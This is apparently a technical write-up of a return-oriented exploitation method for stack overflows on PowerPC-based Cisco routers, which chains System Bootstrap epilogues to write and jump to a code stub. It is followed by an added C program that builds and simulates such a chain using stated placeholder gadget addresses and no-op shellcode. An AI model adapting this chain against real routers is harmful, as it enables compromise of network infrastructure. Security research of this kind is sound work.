Summary
The method relies on the System Bootstrap code found on PowerPC-based access-level routers. The location of the System Bootstrap code is stable, and only around ten different System Bootstrap versions are known to be widely installed on the affected devices, with the single most common version alone covering more than half of all devices.
The method has been shown to work against Cisco 2610, 2621 and 1711 routers.
On the Cisco 2600 platform, the most common System Bootstrap is Version 11.3(2)XA4.
Limitations
This method is only applicable to stack-based buffer overflow vulnerabilities. It may be applied to other classes of bugs if the exploit controls the memory around the stack pointer.
The method also requires a relatively large amount of data to be written onto the stack: an overflow of approximately 192 bytes is sufficient.
The method can be made free of 0x00 bytes, making it suitable for string-based overflows.
Description
Given a stack-based buffer overflow, one can achieve arbitrary code execution by returning into function epilogues of existing code at known addresses. This technique goes by several names but is mostly referred to as "code chunk borrowing" or "return oriented programming" (see this presentation).
In a typical PowerPC epilogue, the callee-saved upper registers (R31, R30, ...) are restored from the stack before the function returns through the saved Link Register (LR), so an overflow that reaches those stack slots controls their values as well as the return address.
The System Bootstrap code is placed on the respective platforms at 0xFFF00000 and onward. This location is stable across IOS images and therefore allows returning into function epilogues there. The inspected version, 11.3(2)XA4, exhibits at least one function epilogue that allows an arbitrary memory write using the upper registers (R29-R31). Since this function also restores the registers in question from the stack, returns into it can be chained, writing multiple 32-bit values to arbitrary locations in memory, one per chained frame.
Another function in the System Bootstrap code region must be chained into the stack layout in order to disable the PowerPC Data and Instruction Caches. The two caches are independent of each other: code written through the data path sits in the data cache, while instruction fetch goes through the instruction cache, so writing code and then executing it does not work with the caches enabled. Such a function can be found early in the Reset Vector handler.
Using the arbitrary memory write coupled with the cache-disabling function, the overflow can write two instructions to a known location and then jump to it. A possible sequence, which transfers control to the current stack pointer (R1) and hence to code placed on the stack after the chained frames, is:

    mtctr %sp
    bctr
An appropriate location to write to is the memory region at 0x80003000, which is where the exception handler code is stored after the MMU is turned on. This area is writable and executable, and its location is independent of the image version.
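As an added example (not code from the original page and not taken from any real exploit), the following C program builds the chained frame layout described above as a byte buffer and checks it against a small model of the gadget semantics; it also counts 0x00 bytes, which is the concern raised under Limitations. Everything target specific is a placeholder assumption: the two gadget addresses (GADGET_WRITE, GADGET_CACHE_OFF), the 32-byte frame each epilogue is assumed to pop, and the displacement STORE_DISP of the write gadget's store. Only the instruction encodings and the two addresses quoted from the page (0xFFF00000 and 0x80003000) are real.

```c
/* Added example, not code from the original page. Builds the chained
 * "return into System Bootstrap epilogue" layout and models the gadgets.
 * All gadget addresses, the frame layout and STORE_DISP are ASSUMPTIONS. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* PowerPC encodings (architectural). mtctr rS is mtspr 9,rS: opcode 31,
 * SPR field split 5/5, XO 467. bctr is bcctr 20,0: opcode 19, BO 20, XO 528. */
uint32_t enc_mtctr(unsigned rs)
{
    const unsigned spr = 9;
    return (31u << 26) | ((rs & 31u) << 21) | ((spr & 31u) << 16) |
           ((spr >> 5) << 11) | (467u << 1);
}
uint32_t enc_bctr(void) { return (19u << 26) | (20u << 21) | (528u << 1); }

/* Placeholder parameters (assumptions, not real gadgets). */
#define BOOTSTRAP_BASE   0xFFF00000u                /* from the page */
#define GADGET_WRITE     (BOOTSTRAP_BASE + 0x1234u) /* assumed: stw r30,STORE_DISP(r29); epilogue */
#define GADGET_CACHE_OFF (BOOTSTRAP_BASE + 0x2345u) /* assumed: cache-disable routine; epilogue */
#define STORE_DISP       0x7FFFu   /* assumed stw displacement; picked so r29 has no 0x00 byte */
#define STUB_ADDR        0x80003000u                /* from the page */
#define FILLER           0x41414141u                /* arbitrary non-zero padding */
#define FRAME_BYTES      32u

static void put32be(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}
uint32_t get32be(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | p[3];
}

/* Assumed frame popped by every epilogue in the chain, modelled on
 *   lwz r0,4(r1); mtlr r0; lmw r29,16(r1); addi r1,r1,32; blr
 * layout: [backchain][LR][pad][pad][r29][r30][r31][pad] */
static void emit_frame(uint8_t *f, uint32_t lr, uint32_t r29, uint32_t r30)
{
    put32be(f + 0, FILLER);  put32be(f + 4, lr);
    put32be(f + 8, FILLER);  put32be(f + 12, FILLER);
    put32be(f + 16, r29);    put32be(f + 20, r30);
    put32be(f + 24, FILLER); put32be(f + 28, FILLER);
}

/* Four chained frames: write "mtctr r1", write "bctr", disable caches, jump
 * to the stub. The stub's bctr lands on r1, i.e. on `shellcode`, which
 * follows the last frame. Returns the payload length, 0 if cap is too small. */
size_t build_chain(uint8_t *out, size_t cap, const uint8_t *shellcode, size_t sc_len)
{
    size_t n = 4 * FRAME_BYTES + sc_len;
    if (cap < n) return 0;
    emit_frame(out + 0 * FRAME_BYTES, GADGET_WRITE,     STUB_ADDR - STORE_DISP,     enc_mtctr(1));
    emit_frame(out + 1 * FRAME_BYTES, GADGET_WRITE,     STUB_ADDR + 4 - STORE_DISP, enc_bctr());
    emit_frame(out + 2 * FRAME_BYTES, GADGET_CACHE_OFF, FILLER, FILLER);
    emit_frame(out + 3 * FRAME_BYTES, STUB_ADDR,        FILLER, FILLER);
    memcpy(out + 4 * FRAME_BYTES, shellcode, sc_len);
    return n;
}

/* 0x00 bytes terminate string based overflows; count where they remain. */
size_t count_nul(const uint8_t *p, size_t n)
{
    size_t c = 0;
    for (size_t i = 0; i < n; i++) c += (p[i] == 0);
    return c;
}

/* Model of the assumed gadget semantics: pops frames as the epilogue would
 * and applies each gadget's effect. Returns 1 when the chain ends at STUB_ADDR
 * with both stub words written, the caches off and r1 on the shellcode. */
int simulate_chain(const uint8_t *payload, size_t len)
{
    uint32_t word[2] = {0, 0}, sp = 0, r29, r30, lr;
    int cache_off = 0;
    for (;;) {
        if (sp + FRAME_BYTES > len) return 0;       /* ran off the payload */
        lr  = get32be(payload + sp + 4);
        r29 = get32be(payload + sp + 16);
        r30 = get32be(payload + sp + 20);
        sp += FRAME_BYTES;
        if (lr == GADGET_WRITE) {
            uint32_t addr = r29 + STORE_DISP;       /* stw r30,STORE_DISP(r29) */
            if (addr == STUB_ADDR) word[0] = r30;
            else if (addr == STUB_ADDR + 4) word[1] = r30;
            else return 0;                          /* write landed elsewhere */
        } else if (lr == GADGET_CACHE_OFF) {
            cache_off = 1;
        } else {
            return lr == STUB_ADDR && cache_off && sp == 4 * FRAME_BYTES &&
                   word[0] == enc_mtctr(1) && word[1] == enc_bctr();
        }
    }
}

/* Constructed sample: a placeholder "shellcode" of four `or r1,r1,r1`
 * (0x7C210B78, a NUL-free no-op) standing in for real payload code. */
static const uint8_t sample_shellcode[16] = {
    0x7C,0x21,0x0B,0x78, 0x7C,0x21,0x0B,0x78, 0x7C,0x21,0x0B,0x78, 0x7C,0x21,0x0B,0x78 };
uint8_t sample_payload[256];
size_t build_sample(void)
{
    return build_chain(sample_payload, sizeof sample_payload,
                       sample_shellcode, sizeof sample_shellcode);
}
```

With these placeholders the payload is 144 bytes, within the roughly 192 bytes the page says are needed. The r29 values avoid 0x00 bytes only because the assumed store displacement lets the write target 0x80003000 be expressed as 0x7FFFB001 + 0x7FFF; the two 0x00 bytes that remain are the final return address 0x80003000 itself in the last frame, which is the spot a fully 0x00-free variant still has to solve (the page does not say how its 0x00-free version does so).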